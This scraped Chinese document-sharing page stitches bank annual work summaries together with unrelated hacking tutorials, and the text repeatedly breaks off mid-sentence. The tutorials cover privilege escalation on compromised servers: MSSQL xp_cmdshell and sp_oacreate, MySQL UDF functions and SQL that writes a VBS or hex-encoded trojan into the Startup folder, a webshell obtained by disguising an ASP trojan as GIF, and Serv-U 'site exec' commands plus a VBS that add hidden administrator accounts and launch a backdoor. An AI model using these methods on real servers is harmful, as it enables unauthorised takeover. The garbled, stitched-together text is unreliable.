银行服务管理工作总结 导语:全力抓好检查制度的落实。今年我们坚持每月定期不定期的对网点进行检查,按照省分行的有关要求,以下xx为大家介绍文章,仅供参考! 篇一 20xx年,在市分行党委的正确领导下,我们认真贯彻落实省分行年初制定的“服务立行、服务兴行、服务出效益、服务是核心竞争力”的经营理念。多次召服务工作联系会议,专题研究和安排部署服务工作,通过集中整治,全行的服务工作有了明显的好转,客户投诉率明显下降。主要抓了以下几项工作。 一、主要工作措施 1、从年初开始,我们将服务工作作为全行的重点工作,结合我行的实际,及时制定了服务管理考核办法和各项具体实施规定,并认真贯彻执行;市分行制定了“内部承诺奖励处罚办法”,重新修订《服务工作检查考核办法》,《工会工作目标管理考核办法》、《客户投诉管理办法》等,使服务工作的管理制度更加完善,达到系统化、规范化。并汇集成册,下发各行组织员工进行学习和讨论。 2、市分行党委十分重视服务工作,在工作安排、检查、总结时都有服务工作的内容,由一把手负总责,分管领导专

门抓、主管部门具体抓,专业部门配合抓,初步形成全行齐抓共管的大服务格局,员工服务意识的提高和服务质量的进一步增强,在客户中产生良好影响,保证了各项业务健康有序的开展。在今年五月份,在市分行党委的高度重视下,专门召开了服务工作整改动员大会,xx支行班子成员和网点负责人共计100余人参加了会议。市分行党委书记xx同志作了重要讲话,xx部、xx部等部门的负责人作了承诺发言,向一线员工做出了郑重承诺,要求监督执行。网点负责人和员工代表也作了表态发言。会后我们将会议材料汇集成册下发执行,为全年服务工作的顺利开展起到较好推动作用。 3、服务工作纳入行长经营目标管理考核。年初、由市分行分管领导与各支行、城区各网点负责人签订服务工作目标责任书,明确考核的内容,强化服务的管理。并在绩效工资的发放中,专门将服务工作纳入考核,占比为10%,每季由服务办打分考核,与绩效工资挂钩奖罚兑现。有力地推动了优质文明服务工作的开展。 4、立足实际,建设网点。为了突出服务品牌,扩大xx 行影响,市分行对地处繁华路段、客流量较大的xx支行、xx支行和xx支行营业室,按照网点的标准进行了装修改造。安装了标准化户外标牌,分设了现金区、非现金区、个人理财区和客户休息区,使网点的布局多功能化,充分体现了人性化特点,及时适应了不同层次客户群体的服务需求,提升

授渔之1433提权全教程

授渔之<一次1433端口提权的过程> 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.doczj.com/doc/9e12200104.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上

传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西

银行后台柜员工作总结

银行后台柜员工作总结 篇一XX银行柜员工作总结 银行柜员年终总结 时间飞逝,光阴如梭。在忙碌而充实的工作中我们度过了意义非凡的XX年。回顾一年的所有工作令人欣喜。在支行各级领导的带领和分理处主任的指导及同事间共同努力下,我们积极学习业务知识,增加各项业务技能水平,认真履行工作职责,时刻谨记内控制度,圆满完成了全年各项工作指标,在思想觉悟、业务素质、操作技能、优质服务等方面都有了较好提高。现将一年的工作情况总结如下 一、主要工作内容及职责 本人于XX年6月入职,从事综合柜员一职。平日工作主要有柜面对私业务、对公业务、代发工资、反洗钱信息补录等。看似简单的操作,却需要平日多积累多学习操作流程,日益更新,专注、仔细、耐心对待每一笔业务的发生与审核,尤其是对公业务。一个月的支票处理量相对较大,为了减少退票率,也为了提高自己处理对公业务水平,我坚持对每一张票据各个要素进行认真审核,高标准严格要求自己及客户填写规范。伴随着每笔业务发生的同时,也将内部控制制度铭记于心,七步服务流程做到大方得体,将各项政策落到实处。 二、我的收获与成长 我很庆幸自己能够加入农商行,成为其中的一员,工作近一年的时间里,我的价值观和人生观都有个较大的改变,她让我相信人生一切皆有可能,只要自己肯努力创造。当然也只有能为企业做出奉献,才能实现自己的价值。首先,在一个工作团体里,大家要团结一致,互助进取,因为团结是取得互利共赢的前提;其次,做好自己的本职 工作是基本要求,作为一个柜员应该懂得自己该做什么,什么不能做,有主见有胆识;另外,客户是我们发展的主体,服务好客户是我们的职责,研究客户,通过对客户的研究从而达到了解客户的业务需求,力争使每一位客户满意,通过自身的努力来维护好每一位客户;当然,通过对业务的熟悉和对企业内部控制的了解之后,能为企业的一些潜在的漏洞或发展提出建设性的意见是我们份内之事,也是为企业能做的较好的贡献。 在市场竞争日趋激烈的今天,在具有热情的服务态度,娴熟的业务能力的同时,还必须要不断的学习,提高自己各方面的能力水平,才能向客户提供更高效率、更优质的服务。我行举办的各类培训和技能考核为我尽快提高业务技能提供了有力的保障。我始终积极参加各类培训,坚持认真听课,结合平时学习的规章制度和法律法规,努力提高着自己的业务能力水平。通过一段时间的工作,我深刻体会到银行是一个高风险的行业,办理每一笔业务都要注意到每一个小细节 和要素,它可以是一个复核、一个签章、一个客签名、一个手印、一个登记、一个交易码。一笔业务可能涉及到很多个细节问题,如果因为粗心大意,不用心想,漏掉一个没有做到,都有可能存在风险,就比如放贷款。细节不是儿戏,需要我们严肃对待。严格把守每一

银行后台年度工作总结文档2篇

银行后台年度工作总结文档2篇Annual work summary document of bank back office 汇报人:JinTai College

银行后台年度工作总结文档2篇 小泰温馨提示:工作总结是将一个时间段的工作进行一次全面系统的总检查、总评价、总分析,并分析不足。通过总结,可以把零散的、肤浅的感性认识上升为系统、深刻的理性认识,从而得出科学的结论,以便改正缺点,吸取经验教训,指引下一步工作顺利展开。本文档根据工作总结的书写内容要求,带有自我性、回顾性、客观性和经验性的特点全面复盘,具有实践指导意义。便于学习和使用,本文下载后内容可随意调整修改及打印。 本文简要目录如下:【下载该文档后使用Word打开,按住键盘Ctrl键且鼠标单击目录内容即可跳转到对应篇章】 1、篇章1:银行柜员20xx年度个人工作总结文档 2、篇章2:银行人员个人年度工作总结文档 导读:在将来迎来的一年中,我会继续努力,将我的工 作能力提高到一个新的档次,不辜负大家对我的期望,我会尽我所能的工作,帮助我行实现发展,相信我行的明天会更好! 以下是由小泰J.L为您整理推荐的银行年度工作总结,欢迎参考阅读。 篇一:银行人员年度个人工作总结 一、一年来的学习工作情况

1、在学习上更加注重“三个加强,三个提高”。 一是加强政治学习,不断提高自己的思想政治觉悟和政治理论水平。结合支行今年开展保持共h产j党员先进性教育活动,系统的、认真的学习了马克思主义的哲学、政治经济学理论读本、毛主席的为人民服务、邓小平建设有中国特色的社会理论和三个代表的重要思想,做学习笔记三万余字,写心得体会有10余篇,通过学习使自己的人生观、世界观、价值观得到了彻底的改造,自己的思想觉悟又得到了进一步的提高。 二是加强对业务知识的学习,不断提高自己的业务素质和业务能力。按照支行党组、行长的工作分工安排,我主要协助行长分管办公室、货币信贷统计股、外汇管理股的工作,这三个股室的工作业务性都比较强,为此,在平时的工作中,我注意测重加强对这个三股室业务知识的学习。利用业余时间学习了新的办公室公文起草、公文处理、科技方面的计算管理;货币信贷管理操作、征信管理、货币政策、金融稳定、信用环境建设、农村信用社改革;外汇管理的结、售汇管理、收汇核销的操作等等。从制度规定到操作程序、操作规程、风险控制等都有了进一步的了解。 三是加强了对管理知识的学习,提高自身对分管工作组织与协调的能力。管理是一门科学,也是门艺术,只有通过不

关于mysql提权方法总结

关于mysql提权方法总结 mysql是一种开放源代码的关系型数据库管理系统(rdbms),mysql数据库系统使用 最常用的数据库管理语言--结构化查询语言(sql)进行数据库管理。那么对于mysql提权的方法,站长们是否了解呢?专职优化、域名注册、网站空间、虚拟主机、服务器托管、vps 主机、服务器租用的中国信息港在这里为你做深入探讨! mysql提权总结方法四则 一 UDF提权 这类提权方法我想大家已经知道了,我大致写一下,具体语句如下: 1 create function cmdshell returns string soname 'udf.dll' 2 select cmdshell('net user iis_user 123!@#abcABC /add'); 3 select cmdshell('net localgroup administrators iis_user /add'); 4 select cmdshell('regedit /s d:\web\3389.reg'); 5 drop function cmdshell; 6 select cmdshell('netstat -an'); 二 VBS启动项提权 1 create table a (cmd text); 2 insert into a values ("set wshshell=createobject (""wscript.shell"") " ); 3 insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user 123!@#abcABC /add"",0) " ); 4 insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators iis_user /add"",0) " ); 5 select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动 \\a.vbs"; 先在webshell里连接上数据库,建立表,将VBS写入表里,然后导入启动项, 如果UDF提权不行的话也可以尝试下这个方法,前提是要有ROOT权限,后面有个,0表示不弹出CMD窗口,安静的运行。 还可以这样写: 1 create table a (cmd BLOB); 2 insert into a values (CONVERT(木马的 16进制代码,CHAR)); 3 select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe' 4 drop table a; 执行前3条语句,就可以将木马写进启动里了,前提是木马一定要是16进制,还有就是路径要是\\,因为windows会自动过滤掉一个\

银行 工作总结工作总结

银行工作总结工作总结 xx年对支行来讲,是辛勤耕耘的一年,是适应变革的一年,是开拓创新的一年,也是理清思路、加快发展的一年。在全体员工的共同努力下,**路支行坚持年初制订的工作思路,克服重重困难,团结一致,勇于开拓,在坚持规范经营、防范风险的前提下,以发展为主线,以利润为目标,以高品质、专业化服务为手段,积极扩展市场、创新产品、培育客户,实现了各项业务的全面、快速增长。现将xx 年工作情况汇报如下: 一、经营业绩 1、负债业务:截至11月底,我行全口径存款时点达到60978万元,较年初增长2358万元,其中对公存款余额达28614万元,较年初增长1525万元,储蓄存款时点余额32364万元,较年初增长833万元。截止11月底全年全口径日均存款余额为60625万元,较年初增长1020万元,其中对公存款日均已浮出水面,较年初正增长39万元,余额为27517万元;储蓄存款日均余额为33108万元,较年初新增981万元。 2、资产业务:截止11月底,我行贷款余额为40273万元,比年初新增万元。9月底,我行向**项目成功营销4亿元贷款,并分别于9月底投放2亿元、11月置换1亿元固定资产贷款,有效调整了我行的贷款结构,提高了利息收入水平。同时,我行今年在房地产项目贷款营销上也取得了较好的成绩,分别营销**、**两家优质房地产企业贷款各5000万元,为我行房地产金融业务打下了良好的基础。

全年累计收息达到634.26万元,资产质量良好。全年累计签发银行承兑汇票达13189万元,手续费收入达到6.6万元。 3、中间业务:今年我行对中间业务收入的认识有了较大的提高,并积极拓展中间业务收入的各种渠道,积极组织收入,提高收益水平。截止11月底,全年累计中间业务收入达172万元,比去年增速达到215%。其中10月份我行收到第一笔财务顾问收入7.5万元,以及国际结售汇收入2800元,开拓了新的中间业务空间。代理发售国债1651万元,基金1300万元,信托280万元,各类保险25万元,理财产品中间业务收入达到**万元。 4、国际业务:今年我行国际业务有了较大的进展。通过营销**科技、**等有进出口业务的贸易企业,我行仅10月和11月就完成对公企业国际结售汇82.59万元,国际结算量达到71.71万元。11月,经上级行批准我行开办外汇储蓄业务后,我行积极行动,对前台员工进行多次国际业务培训,悬挂宣传条幅进行业务推介,并在较短的时间内开始办理业务,为我行今后国际业务和外汇理财业务的发展奠定了坚实的基础。 5、电子银行业务:为了给客户提供方便快捷的高科技服务,减轻前台压力,今年我行对电子银行业务的发展提出了较高的目标。截止11月底,我行共发展企业网银客户14户,个人网银273户,CALLCENTER签约287户,网银结算量达到32393万元。 6、其他方面:xx年**路支行在结算服务、核算质量、安全生产等方面也取得了一定的成绩,实现全年安全生产无事故。同时也积

【法客周年庆】跟着黑客走吃喝全都有,提权 (二)

目录 1、进shell检查权限 (1) 2、扫端口 (1) 3、43958 开了 (2) 4、1433开了得到dbo权限 (2) 5、找到Serv-U目录无法访问 (3) 6、尝试mysql提权 (3) 7、尝试su提权 (4) 8、SU提权 (5) 9、总结 (5) 1、进shell检查权限 首先这个是看到坛子里面的一个求助提权贴提权的,以前在hake发过,但没这么详细 溜达进shell看了下子。。 aspx支持的完好,不过权限还是比较低的。。 IISSPY可以完美跨目录,那么提权还是有大大的希望的。。 2、扫端口 127.0.0.1 : 21 ................................. Open 127.0.0.1 : 25 ................................. Open 127.0.0.1 : 80 ................................. Open 127.0.0.1 : 110 ................................. Open 127.0.0.1 : 1433 ................................. Open 127.0.0.1 : 1723 ................................. Close 127.0.0.1 : 3306 ................................. Open 127.0.0.1 : 3389 ................................. Open 127.0.0.1 : 4899 ................................. Close 127.0.0.1 : 5631 ................................. Close 127.0.0.1 : 43958 ................................. Open 127.0.0.1 : 65500 ................................. Close

获得网站WEBSHELL权限的截图0

获得网站WEBSHELL权限 一、学习目标:在得到了管理员帐号的情况下,进入网站的管理员后台,以备份数据库得到WEBSEHLL。 二、知识要点:在入侵网站之前,信息搜集是第一步,任何情况的搜集,当情况搜集有初步成果之后,应该首先试图获得管理员的帐号和密码,然后找出网站的后台(看管理员在后台的什么地方),对于现成的整站系统而言,通常后台是固定的,只要搞到网站就能以管理员的帐号进入。进了后台,就有了能力对网站进行操作,我们就有了很大的把握获得的一个WEBSEHLL。所谓WEBSEHLL,也就是一个脚本,这个脚本,具有可以管理WEB、修改主页内容的权限,如果要修改别人的主页,一般都需要这个权限(上传漏洞要得到的也是这个权限)。它可对网站的任何文件进行编辑,移动,复制,删除。如果某个服务器权限设置得不好,那么通过webshell可以得到该服务器的最高权限----即可以得到的是整个网站的操作权限,并且是进一步渗透获得主机权限的立脚点。 在进入管理后台后,获得WEBSHELL的首选方法是通过"备份数据库"的方法上传一个扩展名改成GIF的ASP木马,(之所以要把ASP的木马护展名由ASP改为GIF,是因为一般网站都有检测护展名,当检测到护展名为ASP时就不会允许上传),上传之后,用备份数据库的办法,把GIF护展名,备份成为ASP护展名,然后连接备份后的ASP地址,就能打开你上传的ASP木马,一个WEBSEHLL就到手了。具体方法为在备份数据库地址里输入你上传的GIF文件的相对地址,在恢复地址里输入你要生成的ASP地文件的路径和文件名,然后恢复数据库即可。 三、实验步骤 1、IE浏览器中输入https://www.doczj.com/doc/9e12200104.html,/bbsxp1(之前已经通过某方法得到网站后台管理员的用户名、口令)。 (1)以管理员身份登录网站前台,如图1。 图1 (2)在图2界面中进入ACCESS数据库管理,并在图3界面中输入后台管理员密码完成登录。

银行运营部工作总结

银行运营部工作总结 篇一:银行运营部年度工作总结报告 时光飞逝,转眼我进入XX银行XX分行已经有半年多的时间了,银行工作岗位众多、卧虎藏龙,个个都本事非凡,取他人之长补己之短,是每个新人快速成长不断提高的保障。众多领导、各位师傅前辈无私的将自己的经验教训传授于我,使我在快速成长的路上少走了不少弯路,通过和他们持续的交流不断的修正自己的方向,我也得以努力的快乐成长。在这短暂又宝贵的半年时间中我先后在个贷管理部和分行运营部实习,银行的岗位众多最后在多方领导的安排照顾下,在运营部找到了专业对口,自己也非常满意和珍惜的运营核算工作。 在半年的工作实习中,我收获良多。 首先,在各位前辈的帮助和教导下,对银行运营条线的工作性质有了初步认知。运营条线工作量大,风险点较多,工作错不得,一次操作失误将会给银行的资金和声誉造成无法挽回的损失,因此对待这份工作要抱有敬畏之心,不敢有半分的倦怠和随意。核算中心虽然不直接和客户打交道,但在后台的操作中会对客户资金起举足轻重的作用,例如在对待资金落地的处理上若有一刻怠慢就会造成汇路的不畅通,给XX银行的客户造成不必要的麻烦。因此对待在核算中心的工作还要有时间意识,学会和时间赛跑,在出现类似资金

落地的情况时要在第一时间作出准确判断并予以解决。核算中心的工作还要求我们有极强的风险防控意识,妥善保管带有XX银行字样的业务印章及其他重控物件,工作中双人复核等等要求都让我意识到今后工作岗位的重要性。 其次,在XX的细心呵护下,在XX和XX的无私帮助下,我学习了一部分核算中心的工作要点和账务处理。包括大小额资金调缴同城银联打印报表装订传票等等,在学习中我见识到前辈对工作负责认真的态度和她们的专业素养,我渴望早日成为像她们那样优秀的核算中心员工。 最后,通过参与XX年底的全面对账和XX年一季度的重点对账工作,我对银企对账工作流程和重要性有了初步的了解。①银对账催收要善于于客户沟通。银对账的催收工作通常是通过电话与企业财务人员取得联系的,没有面对面的接触,如何让客户接受我的工作,并配合我完成上银行的对账点击这着实让我下了一些功夫。我认为首先语音要柔和,通过亲和力取得客户的信任。其次是发送准确的指令,譬如在实际工作中我发现给客户说“尽快点击”往往没有明显的效果,而通知客户“我行现在正在集中办理银对账工作,需要在两个工作日中完成操作”则明确向客户传达出来两个工作日的时间要求,帮助客户尽快完成银的点击,达到了比较好的效果。最后当然就是一而再再而三的“轰炸式”催收了,这对于那些不是特别愿意配合的客户还是取得了一定的效

九种经典的Webshell提权

说到花了九牛二虎的力气获得了一个webshell, 当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~ 嘻嘻~~好跟我来,看看有什么可以利用的来提升权限 第一 如果服务器上有装了pcanywhere服务端,管理员为了管理方便 也给了我们方便,到系统盘的Documents and Settings/All Us ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地 破解就使用pcanywhere连接就ok了 第二 有很多小黑问我这么把webshell的iis user权限提升 一般服务器的管理都是本机设计完毕然后上传到空间里, 那么就会用到ftp,服务器使用最多的就是servu 那么我们就利用servu来提升权限 通过servu提升权限需要servu安装目录可写~ 好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖,启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限 然后去servu安装目录里把ServUDaemon.ini更换服务器上的。 用我新建的用户和密码连接~ 好的,还是连上了 ftp ftp>open ip Connected to ip. 220 Serv-U FTP Server v5.0.0.4 for WinSock ready... User (ip:(none)): id //刚才添加的用户 331 User name okay, please send complete E-mail address as password. Password:password //密码 230 User logged in, proceed. ftp> cd winnt //进入win2k的winnt目录 250 Directory changed to /WINNT ftp>cd system32 //进入system32目录 250 Directory changed to /WINNT/system32 ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe 文件加用户。 如果提示没有权限,那我们就 把后门(server.exe)传他system32目录 然后写一个VBs教本 set wshshell=createobject ("wscript.shell") a=wshshell.run ("cmd.exe /c net user user pass /add",0) b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0) b=wshshell.run ("cmd.exe /c server.exe",0)

银行运营管理工作总结

中国农业银行运营管理工作总结 今年,我行运营管理工作在市分行党委的正确领导和省分行业务主管部门的精心指导下,认真贯彻落实年初工作会议精神,围绕“三大集中”,加快实施“集中授权、集中作业、集中配送、集中对账”工作,积极组建运营管理组织体系,实施业务流程再造,夯实运营管理基础,不断强化运营业务操作风险管控,进一步优化网点作业流程,规范操作,把内控管理各项制度真正落到实处,运营管理水平得到进一步的提升,会计内控管理能力得到进一步加强,为我行稳健经营、持续发展保驾护航,确保无案件事故发生。现将全年工作开展情况总结如下: 一、工作目标完成情况 (一)后台中心建设取得突破性进展。截至年末,建成了市分行集中作业中心、远程集中授权中心。在全行初步搭建了前后台分离、后台集中的作业模式,减少了客户等待时间,降低网点柜员的营运作业压力,标志着我行柜面业务流程再造工作取得了实质性进展,临柜业务处理正式迈入一个新的时代,我行的现代化运营体系建设工作进入了高速发展阶段。 (二)现金中心集约化服务效果显著。完成了市分行现金中心功能分区改造,并顺利通过省分行验收,现金中心的功能得到进一步完善,对遂宁城区的离行式ATM机实现了集中加钞,现金调拨系统运行规范,现金集中清分、

现金与重空凭证集中配送运作规范有效,柜面人员减负作用显著,切实提高了对网点作业的支持保障与服务能力。 (三)运营业务基础管理持续夯实。一是建立健全运营业务规章制度,坚持质量控制、风险管理和考核评价多策并举,制定和完善了《监管员履职管理考核办法》、《运营主管履职考核办法》、《柜员星级管理办法》、《集中对账管理考核办法》、《运营业务考评实施细则》等制度。二是推行运营作业季度分析例会制度,各级行召开运营风险分析例会20次,16名监管人员深入到46个营业机构进行“坐班体验”。三是组织各种培训16期,共2316人(次)参加培训。 (四)运营操作风险管理水平持续提升。市县行共对220个次机构实施了尽职监管检查,尽职检查频率达到100%;组织开展财政账户、支付结算、定期存款、对账管理、印押证管理等专项检查。实现了全年无运营操作案件和重大差错事故的目标。 二、主要工作措施 (一)大力推进“三大集中”建设,后台集中成效逐步显现。 今年,我行为响应上级行对运营工作大集中的有关政策,认真贯彻执行省分行的战略部署,投入大量的人力、财力和物力,为积极推进运营体系各项集中任务的快速落实做了大量的尝试和富有成效的工作。

MSSQL 通过存储过程调用WEB服务解决方法

MSSQL 通过存储过程调用WEB服务解决方法 在数据库的脚本开发过程中,由于需要及时的通过服务中网站中获取及时信息,比如:输入身份证查询考试成绩,输入身份证查询医保卡信息等;SQLSERVER中存储过程来调用外部服务,但是此服务需要sysadmin角色权限。 以下为配置的要求以及源代码: 1, 环境需求设置 开通’ sys.sp_OACreate’以及'Ole Automation Procedures'访问设置: 如果要是SQLSERVER里面实现调用WEB服务、操作文件等相关操作,需通过SQLSERVER的自带组建Ole Automation Procedures,默认情况下这个组件是禁止的。 SQL Server阻止了对组件'Ole Automation Procedures'的过程'sys.sp_OACreate'的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure启用'Ole Automation Procedures'。有关启用'Ole Automation Procedures'的详细信息,请参阅SQL Server联机丛书中的"外围应用配置器"。语句已终止。 Ole Automation Procedures选项 使用Ole Automation Procedures选项可指定是否可以在Transact-SQL批处理中实例化OLE Automation对象。也可以使用外围应用配置器工具来配置此选项。有关详细信息,请参阅外围应用配置器。 可以将Ole Automation Procedures选项设置为以下值。 禁用OLE Automation Procedures。SQL Server 2005新实例的默认值。 1 启用OLE Automation Procedures。

银行后台柜员工作总结

银行后台柜员工作总结 篇一:XX银行柜员工作总结 银行柜员年终总结 时间飞逝,光阴如梭。在忙碌而充实的工作中我们度过了意义非凡的XX年。回顾一年的所有工作令人欣喜。在支行各级领导的带领和分理处主任的指导及同事间共同努力下,我们积极学习业务知识,增加各项业务技能水平,认真履行工作职责,时刻谨记内控制度,圆满完成了全年各项工作指标,在思想觉悟、业务素质、操作技能、优质服务等方面都有了较好提高。现将一年的工作情况总结如下: 一、主要工作内容及职责 本人于XX年6月入职,从事综合柜员一职。平日工作主要有柜面对私业务、对公业务、代发工资、反洗钱信息补录等。看似简单的操作,却需要平日多积累多学习操作流程,日益更新,专注、仔细、耐心对待每一笔业务的发生与审核,尤其是对公业务。一个月的支票处理量相对较大,为了减少退票率,也为了提高自己处理对公业务水平,我坚持对每一张票据各个要素进行认真审核,高标准严格要求自己及客户填写规范。伴随着每笔业务发生的同时,也将内部控制制度铭记于心,七步服务流程做到大方得体,将各项政策落到实处。 二、我的收获与成长

我很庆幸自己能够加入农商行,成为其中的一员,工作近一年的时间里,我的价值观和人生观都有个较大的改变,她让我相信人生一切皆有可能,只要自己肯努力创造。当然也只有能为企业做出奉献,才能实现自己的价值。首先,在一个工作团体里,大家要团结一致,互助进取,因为团结是取得互利共赢的前提;其次,做好自己的本职 工作是基本要求,作为一个柜员应该懂得自己该做什么,什么不能做,有主见有胆识;另外,客户是我们发展的主体,服务好客户是我们的职责,研究客户,通过对客户的研究从而达到了解客户的业务需求,力争使每一位客户满意,通过自身的努力来维护好每一位客户;当然,通过对业务的熟悉和对企业内部控制的了解之后,能为企业的一些潜在的漏洞或发展提出建设性的意见是我们份内之事,也是为企业能做的较好的贡献。 在市场竞争日趋激烈的今天,在具有热情的服务态度,娴熟的业务能力的同时,还必须要不断的学习,提高自己各方面的能力水平,才能向客户提供更高效率、更优质的服务。我行举办的各类培训和技能考核为我尽快提高业务技能提供了有力的保障。我始终积极参加各类培训,坚持认真听课,结合平时学习的规章制度和法律法规,努力提高着自己的业务能力水平。通过一段时间的工作,我深刻体会到银行是一个高风险的行业,办理每一笔业务都要注意到每一个小细节

相关主题
文本预览
相关文档 最新文档